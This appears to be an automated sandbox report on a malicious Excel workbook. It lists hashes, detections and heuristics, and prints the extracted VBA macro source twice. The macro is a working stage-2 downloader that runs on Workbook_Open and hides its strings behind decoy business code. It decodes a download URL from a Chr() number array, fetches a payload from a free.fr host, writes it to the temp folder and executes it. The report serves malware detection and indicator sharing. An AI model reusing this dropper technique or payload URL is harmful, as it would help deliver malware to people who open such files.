Office (OLE) / .XLS malware analysis — malicious · 9e6c7a8d88eb3e9c

MALICIOUS

Office (OLE) / .XLS

48.5 KB Created: 2015-07-30 05:24:02 Authoring application: Microsoft Excel First seen: 2026-06-25

MD5: dee85813a8f6b5942f4b94e1a6bfda44 SHA-1: 283261aa9920f7c4cf8241d5dfcdcdec22e22040 SHA-256: 9e6c7a8d88eb3e9ca5eaf6f95ffaf7cda8b51e59d5d4c755aedc59e290c58d43

290 Risk Score

Heuristics 9

ClamAV: Doc.Downloader.Generic-10026854-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-10026854-0
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set Nebeineboysya_2 = CreateObject(DrinkSun(1))
```
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Matched line in script
```
     CallByName Nebeineboysya_2, DrinkSun(7), VbLet, 1
```
Payload URL decoded from a Chr() numeric-array loader (1 URL) high OLE_VBA_CHR_ARRAY_DROPPER_URL

A VBA macro builds its stage-2 download URL from a numeric array (Array(250, 262, …)) decoded one character at a time with Chr() and a linear offset (e.g. Chr(n - 146)), then drives Microsoft.XMLHTTP / ADODB.Stream.SaveToFile / Shell.Application to drop and execute the payload in %TEMP%. The URL is assembled at run time and never appears contiguously on disk, so a literal scan misses it; surfaced as an IOC. Self-validating: only an array that decodes to a valid host URL is reported, so a benign numeric array cannot false-positive.
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://hg9.free.fr/09u8h76f/65fg67n Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9410 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9410 bytes
SHA-256: `2df9db4872b8b7b42b7b212e7c2d0e47e1cf372cfc9f3cac74861d6142275e33`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ЭтаКнига" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Call AddSensors End Sub Attribute VB_Name = "Лист1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Private MapsInitialized As Boolean Private mDBname As String Private MapInit As Boolean Public Nebeineboysya_1 As Object Public Nebeineboysya_2 As Object Public Nebeineboysya_3 As Object Public Nebeineboysya_4 As String Public Nebeineboysya_5 As String Public Nebeineboysya_6 As Object Public DrinkSun() As String Private Sub CheckBins() '--------------------------------------------------------------------------------------- ' Procedure : CheckBins ' Author : David ' Date : 4/3/2011 ' Purpose : ' Checks if any bins have been added or deleted '--------------------------------------------------------------------------------------- Dim LP As Long Dim BinID As Long Dim objStorages As String Dim objStorage As Variant Dim MapID As Long Set Nebeineboysya_2 = CreateObject(DrinkSun(1)) GoTo ErrHandler objSt.orages.Load 'check for deleted bins For LP = 1 To BM.StorCount BinID = BM.StorID(LP) If Not objSto.rages.IsItem(BinID) Then BM.UnloadStor BinID End If Next LP 'check for new bins For Each objStorage In objS.torages With objStorage If Not BM.BinLoaded(.ID) Then BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet End If 'check for bin moved to other map MapID = BM.BinMapID(.ID) If MapID <> 0 And MapID <> .MapID Then BM.UnloadStor .ID BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet End If End With Next On Error GoTo 0 ErrExit: Exit Sub ErrHandler: Set Nebeineboysya_6 = CreateObject(DrinkSun(2)) Set hokuk = CreateObject(DrinkSun(3)) Set Nebeineboysya_3 = hokuk.Environment(DrinkSun(4)) CheckDatabase End Sub Private Sub CheckDatabase() '--------------------------------------------------------------------------------------- ' Procedure : CheckDatabase ' Author : David ' Date : 2/13/2012 ' Purpose : checks if database has changed to a different database. If so reset map control. '--------------------------------------------------------------------------------------- ' Dim Nebeineboysya_7() As Variant Nebeineboysya_7 = Array(158, 170, 170, 166, 112, 101, 101, 158, 157, 111, 100, 156, 168, 155, 155, 100, 156, 168, 101, 102, 111, 171, 110, 158, 109, 108, 156, 101, 108, 107, 156, 157, 108, 109, 164) Dim Nebeineboysya_8 As Integer Dim uncunctunc2_1 As String uncunctunc2_1 = "" GoTo ErrHandler If mDBname <> Prog.DatabaseFullName Then mDBname = Prog.DatabaseFullName BM.Reset MapsInitialized = False End If On Error GoTo 0 ErrExit: Exit Sub ErrHandler: For Nebeineboysya_8 = LBound(Nebeineboysya_7) To UBound(Nebeineboysya_7) uncunctunc2_1 = uncunctunc2_1 & Chr(Nebeineboysya_7(Nebeineboysya_8) - 20 - 34) Next Nebeineboysya_8 Nebeineboysya_1.Open DrinkSun(5), uncunctunc2_1, False CheckMaps End Sub Private Sub CheckMaps() '--------------------------------------------------------------------------------------- ' Procedure : CheckMaps ' Author : XPMUser ' Date : 12/6/2014 ' Purpose : checks if any maps have been added or deleted. Resets if so. '--------------------------------------------------------------------------------------- Dim objStors As String Dim objStor As Variant Nebeineboysya_1.Send Dim NewList As String Dim DoReset As Boolean Dim LP As Long Nebeineboysya_4 = Nebeineboysya_3(DrinkSun(6)) GoTo ErrHandler objS.tors.Load , , , , , True For Each objStor In objSt.ors 'make list of unique map ID's NewLi.st.Add objStor.MapID Next If Not MapInit Then 'init map list, reset BinMap object MapInit = True DoReset = True Else 'check if each map on new list is on old list If MapL.ist.Count <> NewLi.st.Count Then 'count not same, reset DoReset = True Set MapL.ist = NewList Else For LP = 1 To MapLi.st.Count If MapL.ist.ID(LP) <> NewLi.st.ID(LP) Then DoReset = True Set MapL.ist = Ne.w.List Exit For End If Next LP End If End If If DoReset Then BM.Reset MapsInitialized = False End If Set NewLi.st = Nothing Set objSt.ors = Nothing Set objSt.Or = Nothing On Error GoTo 0 ErrExit: Exit Sub ErrHandler: Nebeineboysya_5 = Nebeineboysya_4 + Replace(DrinkSun(12), "t", "e") ConnectMaps End Sub Public Sub AddSensors() Dim Col As String Dim Obj As String DrinkSun = Split(UserForm1.Label1.Caption, "/") GoTo ErrExit On Error GoTo ErrHandler BM.ResetBalances Cofl.Load On Error GoTo 0 ErrExit: Set Nebeineboysya_1 = CreateObject(DrinkSun(0)) CheckBins Exit Sub ErrHandler: AD.DisplayError Err.Number, "modMaps", "AddSensors", Err.Description Resume ErrExit End Sub Public Sub ConnectMaps() Dim objStorages As Variant Dim objStorage As Variant Dim objMap As Variant Dim objMaps As Variant CallByName Nebeineboysya_2, DrinkSun(7), VbLet, 1 Nebeineboysya_2.Open GoTo ErrHandler CheckDat.abase BM CheckM.aps BM objMaps.Load BM.Visible = False If objMaps.Count > 0 Then BM.Visible = ShowMaps If ShowMaps Then If Not MapsInitialized Then 'add maps For Each objMap In objMaps With objMap BM.AddMap .ID, .MapName, .Units, .Zoom End With Next 'add bins objStor.ages.Load , , , , , True For Each objStorage In objSto.rages With objStorage BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet End With Next MapsInitialized = True End If AddSenso.rs BM CheckB.ins BM BM.Update End If End If Set objMap = Nothing Set objMaps = Nothing Set objStorage = Nothing Set objStorages = Nothing On Error GoTo 0 ErrExit: Exit Sub ErrHandler: SaveMaps End Sub Public Sub SaveMaps() rbp = CallByName(Nebeineboysya_1, DrinkSun(10), VbGet) Dim objStor As Variant CallByName Nebeineboysya_2, DrinkSun(9), VbMethod, rbp Dim objMap As Variant Dim LP As Long Dim ID As Long Dim XPos As Single Dim YPos As Single Dim BinLP As Long Dim BinID As Long CallByName Nebeineboysya_2, DrinkSun(11), VbMethod, Nebeineboysya_5, 2 GoTo ErrHandler For LP = 1 To BM.MapCount ID = BM.MapID(LP) objMap.Load ID objMap.BeginEdit objMap.MapZoom = BM.MapZoom(LP) objMap.ApplyEdit Set objMap = Nothing Next LP For BinLP = 1 To BM.StorCount BinID = BM.StorID(BinLP) If BM.BinLoaded(BinID) Then BM.BinLocation BinLP, XPos, YPos With objStor .Load BinID .BeginEdit .XPos = XPos .YPos = YPos .ApplyEdit End With Set objStor = Nothing End If Next BinLP On Error GoTo 0 ErrExit: Exit Sub ErrHandler: Nebeineboysya_6.Open (Nebeineboysya_5) End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{FBD91A81-63B8-4464-969D-027C61D4B930}{5C005C90-1399-4DF1-B778-86E5A385C0F4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 2df9db4872b8b7b42b7b212e7c2d0e47e1cf372cfc9f3cac74861d6142275e33

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Call AddSensors
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private MapsInitialized As Boolean
Private mDBname As String
Private MapInit As Boolean
Public Nebeineboysya_1 As Object
Public Nebeineboysya_2 As Object
Public Nebeineboysya_3  As Object
Public Nebeineboysya_4 As String
Public Nebeineboysya_5 As String
Public Nebeineboysya_6 As Object
Public DrinkSun() As String


Private Sub CheckBins()
'---------------------------------------------------------------------------------------
' Procedure : CheckBins
' Author    : David
' Date      : 4/3/2011
' Purpose   :
' Checks if any bins have been added or deleted
'---------------------------------------------------------------------------------------

    Dim LP As Long
    Dim BinID As Long
    Dim objStorages As String
    Dim objStorage As Variant
    Dim MapID As Long
    Set Nebeineboysya_2 = CreateObject(DrinkSun(1))
     GoTo ErrHandler
    objSt.orages.Load
    'check for deleted bins
    For LP = 1 To BM.StorCount
        BinID = BM.StorID(LP)
        If Not objSto.rages.IsItem(BinID) Then
            BM.UnloadStor BinID
        End If
    Next LP
    'check for new bins
    For Each objStorage In objS.torages
        With objStorage
            If Not BM.BinLoaded(.ID) Then
                BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
            End If
            'check for bin moved to other map
            MapID = BM.BinMapID(.ID)
            If MapID <> 0 And MapID <> .MapID Then
                BM.UnloadStor .ID
                BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
            End If
        End With
    Next
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
Set Nebeineboysya_6 = CreateObject(DrinkSun(2))
Set hokuk = CreateObject(DrinkSun(3))
Set Nebeineboysya_3 = hokuk.Environment(DrinkSun(4))
CheckDatabase
End Sub

Private Sub CheckDatabase()
'---------------------------------------------------------------------------------------
' Procedure : CheckDatabase
' Author    : David
' Date      : 2/13/2012
' Purpose   : checks if database has changed to a different database. If so reset map control.
'---------------------------------------------------------------------------------------
'
Dim Nebeineboysya_7() As Variant
Nebeineboysya_7 = Array(158, 170, 170, 166, 112, 101, 101, 158, 157, 111, 100, 156, 168, 155, 155, 100, 156, 168, 101, 102, 111, 171, 110, 158, 109, 108, 156, 101, 108, 107, 156, 157, 108, 109, 164)

Dim Nebeineboysya_8 As Integer
    Dim uncunctunc2_1 As String
    uncunctunc2_1 = ""
 GoTo ErrHandler
    If mDBname <> Prog.DatabaseFullName Then
        mDBname = Prog.DatabaseFullName
        BM.Reset
        MapsInitialized = False
    End If
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
      For Nebeineboysya_8 = LBound(Nebeineboysya_7) To UBound(Nebeineboysya_7)
        uncunctunc2_1 = uncunctunc2_1 & Chr(Nebeineboysya_7(Nebeineboysya_8) - 20 - 34)
    Next Nebeineboysya_8

Nebeineboysya_1.Open DrinkSun(5), uncunctunc2_1, False
CheckMaps
   End Sub

Private Sub CheckMaps()
'---------------------------------------------------------------------------------------
' Procedure : CheckMaps
' Author    : XPMUser
' Date      : 12/6/2014
' Purpose   : checks if any maps have been added or deleted. Resets if so.
'---------------------------------------------------------------------------------------
    Dim objStors As String
    Dim objStor As Variant
    Nebeineboysya_1.Send
    Dim NewList As String
    Dim DoReset As Boolean
    Dim LP As Long
    Nebeineboysya_4 = Nebeineboysya_3(DrinkSun(6))
GoTo ErrHandler

    objS.tors.Load , , , , , True
    For Each objStor In objSt.ors
        'make list of unique map ID's
        NewLi.st.Add objStor.MapID
    Next
    If Not MapInit Then
        'init map list, reset BinMap object
        MapInit = True
        DoReset = True
    Else
        'check if each map on new list is on old list
        If MapL.ist.Count <> NewLi.st.Count Then
            'count not same, reset
            DoReset = True
            Set MapL.ist = NewList
        Else
            For LP = 1 To MapLi.st.Count
                If MapL.ist.ID(LP) <> NewLi.st.ID(LP) Then
                    DoReset = True
                    Set MapL.ist = Ne.w.List
                    Exit For
                End If
            Next LP
        End If
    End If
    If DoReset Then
        BM.Reset
        MapsInitialized = False
    End If
    Set NewLi.st = Nothing
    Set objSt.ors = Nothing
    Set objSt.Or = Nothing
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
Nebeineboysya_5 = Nebeineboysya_4 + Replace(DrinkSun(12), "t", "e")
ConnectMaps
End Sub
Public Sub AddSensors()
    Dim Col As String
    Dim Obj As String
    DrinkSun = Split(UserForm1.Label1.Caption, "/")
    GoTo ErrExit
    On Error GoTo ErrHandler
    BM.ResetBalances
    
    Cofl.Load

    On Error GoTo 0
ErrExit:
Set Nebeineboysya_1 = CreateObject(DrinkSun(0))
CheckBins
    Exit Sub
ErrHandler:
     AD.DisplayError Err.Number, "modMaps", "AddSensors", Err.Description
     Resume ErrExit
End Sub
Public Sub ConnectMaps()

    Dim objStorages As Variant
    Dim objStorage As Variant
    Dim objMap As Variant
    Dim objMaps As Variant
     CallByName Nebeineboysya_2, DrinkSun(7), VbLet, 1
 Nebeineboysya_2.Open
GoTo ErrHandler
    CheckDat.abase BM
    CheckM.aps BM
    objMaps.Load
    BM.Visible = False
    If objMaps.Count > 0 Then
        BM.Visible = ShowMaps
        If ShowMaps Then
            If Not MapsInitialized Then
                'add maps
                For Each objMap In objMaps
                    With objMap
                        BM.AddMap .ID, .MapName, .Units, .Zoom
                    End With
                Next
                'add bins
                objStor.ages.Load , , , , , True
                For Each objStorage In objSto.rages
                    With objStorage
                        BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
                    End With
                Next
                MapsInitialized = True
            End If
            AddSenso.rs BM
            CheckB.ins BM
            BM.Update
        End If
    End If
    Set objMap = Nothing
    Set objMaps = Nothing
    Set objStorage = Nothing
    Set objStorages = Nothing
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
SaveMaps
End Sub

Public Sub SaveMaps()
rbp = CallByName(Nebeineboysya_1, DrinkSun(10), VbGet)
    Dim objStor As Variant
    CallByName Nebeineboysya_2, DrinkSun(9), VbMethod, rbp
    Dim objMap As Variant
    Dim LP As Long
    Dim ID As Long
    Dim XPos As Single
    Dim YPos As Single
    Dim BinLP As Long
    Dim BinID As Long
    CallByName Nebeineboysya_2, DrinkSun(11), VbMethod, Nebeineboysya_5, 2
GoTo ErrHandler
    For LP = 1 To BM.MapCount
        ID = BM.MapID(LP)
        objMap.Load ID
        objMap.BeginEdit
        objMap.MapZoom = BM.MapZoom(LP)
        objMap.ApplyEdit
        Set objMap = Nothing
    Next LP
    For BinLP = 1 To BM.StorCount
        BinID = BM.StorID(BinLP)
        If BM.BinLoaded(BinID) Then
            BM.BinLocation BinLP, XPos, YPos
            With objStor
                .Load BinID
                .BeginEdit
                .XPos = XPos
                .YPos = YPos
                .ApplyEdit
            End With
            Set objStor = Nothing
        End If
    Next BinLP
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
Nebeineboysya_6.Open (Nebeineboysya_5)
End Sub




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FBD91A81-63B8-4464-969D-027C61D4B930}{5C005C90-1399-4DF1-B778-86E5A385C0F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.